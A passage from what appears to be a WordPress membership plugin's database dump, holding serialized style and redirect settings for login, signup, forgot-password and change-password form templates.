:\".arm_editor_form_fileds_wrapper .arm_login_links_wrapper, .arm_login_links_wrapper{ width:auto !important ; }\";s:11:\"description\";s:67:\"<center>Please enter your email address or username below.</center>\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(16,'Change Password','Change Password','template','template-change-password-4',1,'Template 4',-4,1,4,'a:20:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"0\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:11:\"Create User\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:4:\"left\";s:1:\"0\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:3:\"-40\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"280\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:84:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"80\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"80\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:5:\"green\";s:16:\"lable_font_color\";s:7:\"#131a15\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#e6e6e6\";s:17:\"field_focus_color\";s:7:\"#27c24c\";s:14:\"field_bg_color\";s:7:\"#f0f0f0\";s:17:\"button_back_color\";s:7:\"#27c24c\";s:17:\"button_font_color\";s:7:\"#fcfcfc\";s:18:\"button_hover_color\";s:7:\"#29cc50\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#131a15\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#27c24c\";s:24:\"register_link_font_color\";s:7:\"#27c24c\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:6:\"center\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:14:\"reverse_border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:109:\".arm_editor_form_fileds_wrapper .arm_login_links_wrapper, .arm_login_links_wrapper{ width:auto !important ; }\";s:11:\"description\";s:67:\"<center>Please enter your email address or username below.</center>\";s:7:\"message\";s:35:\"Your password changed successfully.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(17,'Template 5','Please Signup','template','template-registration-5',1,'Template 5',0,1,5,'a:7:{s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:10:\"auto_login\";s:1:\"1\";s:5:\"style\";a:79:{s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:19:\"form_padding_bottom\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:6:\"purple\";s:16:\"lable_font_color\";s:7:\"#919191\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#c7c7c7\";s:17:\"field_focus_color\";s:7:\"#6164c1\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#6164c1\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:18:\"button_hover_color\";s:7:\"#8072cc\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#313131\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#27c24c\";s:24:\"register_link_font_color\";s:7:\"#27c24c\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"12\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"240\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:7:\"classic\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"20\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:2:\"10\";s:15:\"button_position\";s:6:\"center\";}s:27:\"registration_link_type_page\";i:2043;s:30:\"forgot_password_link_type_page\";i:2045;}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(18,'Please Login','Please Login','template','template-login-5',1,'Template 5',-5,1,5,'a:17:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"0\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:6:\"SIGNUP\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"0\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:4:\"left\";s:2:\"80\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:3:\"-40\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"280\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:84:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:6:\"purple\";s:16:\"lable_font_color\";s:7:\"#919191\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#c7c7c7\";s:17:\"field_focus_color\";s:7:\"#6164c1\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#6164c1\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:18:\"button_hover_color\";s:7:\"#8072cc\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#313131\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#6164c1\";s:24:\"register_link_font_color\";s:7:\"#6164c1\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"12\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"240\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:7:\"classic\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(19,'Forgot Password','Forgot Password','template','template-forgot-password-5',1,'Template 5',-5,1,5,'a:18:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"0\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:6:\"SIGNUP\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"0\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:4:\"left\";s:2:\"80\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:3:\"-40\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"280\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:84:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:6:\"purple\";s:16:\"lable_font_color\";s:7:\"#919191\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#c7c7c7\";s:17:\"field_focus_color\";s:7:\"#6164c1\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#6164c1\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:18:\"button_hover_color\";s:7:\"#8072cc\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#313131\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#6164c1\";s:24:\"register_link_font_color\";s:7:\"#6164c1\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"12\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"240\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:7:\"classic\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:11:\"description\";s:67:\"<center>Please enter your email address or username below.</center>\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(20,'Change Password','Change Password','template','template-change-password-5',1,'Template 5',-5,1,5,'a:19:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"0\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:6:\"SIGNUP\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"0\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:4:\"left\";s:2:\"80\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:3:\"-40\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"280\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:84:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:6:\"purple\";s:16:\"lable_font_color\";s:7:\"#919191\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#c7c7c7\";s:17:\"field_focus_color\";s:7:\"#6164c1\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#6164c1\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:18:\"button_hover_color\";s:7:\"#8072cc\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#313131\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#6164c1\";s:24:\"register_link_font_color\";s:7:\"#6164c1\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"12\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"240\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:7:\"classic\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:11:\"description\";s:67:\"<center>Please enter your email address or username below.</center>\";s:7:\"message\";s:35:\"Your password changed successfully.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(101,'Please Signup','Please Signup','registration','please-signup',1,'',0,0,1,'a:4:{s:5:\"style\";a:88:{s:7:\"form_bg\";s:0:\"\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:11:\"form_layout\";s:13:\"writer_border\";s:12:\"form_opacity\";s:1:\"1\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:17:\"form_padding_left\";s:2:\"30\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:13:\"form_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:3:\"rtl\";i:0;s:12:\"color_scheme\";s:4:\"blue\";s:10:\"main_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:26:\"button_back_color_gradient\";s:7:\"#363795\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:27:\"button_hover_color_gradient\";s:7:\"#363795\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#E6E7F5\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"52\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:14:\"field_position\";s:4:\"left\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:18:\"button_margin_left\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:0:\"\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";